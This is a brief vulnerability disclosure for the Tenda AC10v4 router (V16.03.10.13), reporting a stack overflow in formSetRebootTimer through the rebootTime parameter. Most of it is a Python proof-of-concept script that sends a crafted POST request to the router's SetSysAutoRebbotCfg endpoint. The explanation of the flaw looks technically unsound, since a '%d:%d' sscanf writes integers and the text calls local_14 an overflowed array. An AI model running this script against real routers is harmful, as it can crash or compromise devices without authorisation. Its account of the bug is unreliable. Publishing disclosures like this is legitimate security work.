AC10v4 V16.03.10.13
In the Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability located in the formSetRebootTimer function. This function accepts the rebootTime parameter from a POST request by variable __s1_00.
However, since the user has control over the input of __s1_00, the statement sscanf(param_1,"%d:%d",&local_18,&local_14); leads to a buffer overflow. The user-supplied param1can exceed the capacity of the local_14 array, thus triggering this security vulnerability.
import requests
import urllib.parse
url = "<http://192.168.1.100:80/goform/SetSysAutoRebbotCfg>"
data = {'adv_band_5g': '111', 'rebootTime': '00:77888', 'adv_band': 'aed', 'autoRebootEn': '1', 'adv_channel_5g': '0', 'aHv_mode_5g': '00'}
encoded_params = []
for k, v in data.items():
k_encoded = urllib.parse.quote(k)
v_encoded = urllib.parse.quote(v)
encoded_params.append(f"{k_encoded}={v_encoded}")
post_data = "&".join(encoded_params)
response = requests.post(
url,
data=post_data,
timeout=3
)
print("Status Code:", response.status_code)
print("Response Text:", response.text)
